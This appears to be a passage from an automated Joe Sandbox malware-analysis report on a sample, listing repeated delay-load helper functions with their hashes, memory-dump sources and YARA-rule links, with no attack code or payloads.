                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4ff6ab25797f9fdbd335734d3943d29c1064cb2acfdc5d9cb4f9fcc13d49f2d5
                                                            • Instruction ID: 0341d47f3954f81aa66b002baf64116b09e8bd4f8dc24b459a17bad4794f7d25
                                                            • Opcode Fuzzy Hash: 4ff6ab25797f9fdbd335734d3943d29c1064cb2acfdc5d9cb4f9fcc13d49f2d5
                                                            • Instruction Fuzzy Hash: 65B012C96B91447C310C71241C06C3B018CC4E2F20330513EF511C04A6E9404D540471
                                                            Function 001FE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e80b205edb6f5090069787152e38a319272a5fd484d93b803c5f3adc4f60604f
                                                            • Instruction ID: 6643563a80f2c6f6290b7eb868d969ae688ad685ebf89ac281cb818e3efc84fa
                                                            • Opcode Fuzzy Hash: e80b205edb6f5090069787152e38a319272a5fd484d93b803c5f3adc4f60604f
                                                            • Instruction Fuzzy Hash: EBB012C96B91447D310CB1081C02D3B01CCC0D2F20330512EF505C00A5E9404C500471
                                                            Function 001FE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 58dd54e823aa29ace376d41d2056095a985ef344c526afb09778f28b7b7aac3c
                                                            • Instruction ID: 511c9a2da49fa08afdd0ff5ddff13efec427255d307101d69eb362f7db2a4ed5
                                                            • Opcode Fuzzy Hash: 58dd54e823aa29ace376d41d2056095a985ef344c526afb09778f28b7b7aac3c
                                                            • Instruction Fuzzy Hash: 11B012C96B91847C320CB1081D02C3B05CCC0D2F20330912EF605C00A5E9404C510471
                                                            Function 001FE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE51F
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 31d25d912cc6a02ba8dd87999ed8dd38f5542d4740d508eaefc59da19684c0ef
                                                            • Instruction ID: 1a2e79caa2639fed845ce605482ec0d32469a8f100dbd75ea01f948bd86b583b
                                                            • Opcode Fuzzy Hash: 31d25d912cc6a02ba8dd87999ed8dd38f5542d4740d508eaefc59da19684c0ef
                                                            • Instruction Fuzzy Hash: 3BB012C96B96447C320CB1085C03C3B01CCC0D2F20330532EF505C00A5EA404C940471
                                                            Function 001FE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 42fa0fac7629c43e498d080b8aefa6050a0835d379db1eac0b145e3e1d06ace6
                                                            • Instruction ID: 1a26c54a74a8054c7715f623836847689bc952514ff390661c7c701a5aea467b
                                                            • Opcode Fuzzy Hash: 42fa0fac7629c43e498d080b8aefa6050a0835d379db1eac0b145e3e1d06ace6
                                                            • Instruction Fuzzy Hash: DDB012C92FC24C7D310CA1541C02C3701CCC0D1B20331403EF50DC50A4E9400C600831
                                                            Function 001FE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5ea053ae3516d00e772ddac32fca45e56567c1a7b7569141b5181bfd880745e6
                                                            • Instruction ID: 5d836886751669589bb6d8a1d2d0dcb691c854d0296023b8acef23cd75031f4d
                                                            • Opcode Fuzzy Hash: 5ea053ae3516d00e772ddac32fca45e56567c1a7b7569141b5181bfd880745e6
                                                            • Instruction Fuzzy Hash: 53B012C92FC3487C314CA1545C03C3701DCC0D1B20331423EF50DC50A4EA400CA00831
                                                            Function 001FE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE580
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5e8f1a640e3f6651218e329af3e4e519371750d9f3877b2fb24ea32e6d863770
                                                            • Instruction ID: 11f4d3d1c97106d2875276b8ac23a36df7b55029fc8934bbb639ee60238ca889
                                                            • Opcode Fuzzy Hash: 5e8f1a640e3f6651218e329af3e4e519371750d9f3877b2fb24ea32e6d863770
                                                            • Instruction Fuzzy Hash: F7B012C92FC2487C310CA1545D02C3701DCC0D1B20331423EF50DC50A4EE400D610831
                                                            Function 001FE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6fcccbaf64919e1300b60cf60d1a697068fcdb9c41df584132036839bd1c6c0f
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 6fcccbaf64919e1300b60cf60d1a697068fcdb9c41df584132036839bd1c6c0f
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 287408f1180ef44f3af1ce037aa32cedb073ebc7226d61d58d4ffb99d6b2e813
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 287408f1180ef44f3af1ce037aa32cedb073ebc7226d61d58d4ffb99d6b2e813
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 240db9eea2c597a4016688d741b02ee0b25302e0fe4c6f56943c28eba201df08
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 240db9eea2c597a4016688d741b02ee0b25302e0fe4c6f56943c28eba201df08
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 54d30f75159933bd2855cbb57dfad014f725ba2354f8ce5f5e290b9367c785cb
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 54d30f75159933bd2855cbb57dfad014f725ba2354f8ce5f5e290b9367c785cb
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 976a0206e8c1f334448fb056bdfd7ace4f5b4b7275834af01ceee48b7d8e3111
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 976a0206e8c1f334448fb056bdfd7ace4f5b4b7275834af01ceee48b7d8e3111
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9fb8370175629c107886d862dbc8b97f08d06c0292d1fb08920d7d84b0407414
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 9fb8370175629c107886d862dbc8b97f08d06c0292d1fb08920d7d84b0407414
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: fe879e919e416363867d20868abad6ecb3182931792fae641d32876384c70e78
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: fe879e919e416363867d20868abad6ecb3182931792fae641d32876384c70e78
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 84b2f3ab35b4c89a19d49395ea6a6cc0511ab52d7ce5d815b0e5e975f4e590cd
                                                            • Instruction ID: debead5ea354b3354a455c32ecec9937a27802f8154d89977bb0bb825890c725
                                                            • Opcode Fuzzy Hash: 84b2f3ab35b4c89a19d49395ea6a6cc0511ab52d7ce5d815b0e5e975f4e590cd
                                                            • Instruction Fuzzy Hash: 1BA011EA2AC20ABC302832022C02C3B028EC0E2BA0330882EFA03C00A0AA8028800830
                                                            Function 001FE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001FE1E3
                                                              • Part of subcall function 001FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001FE8D0
                                                              • Part of subcall function 001FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001FE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
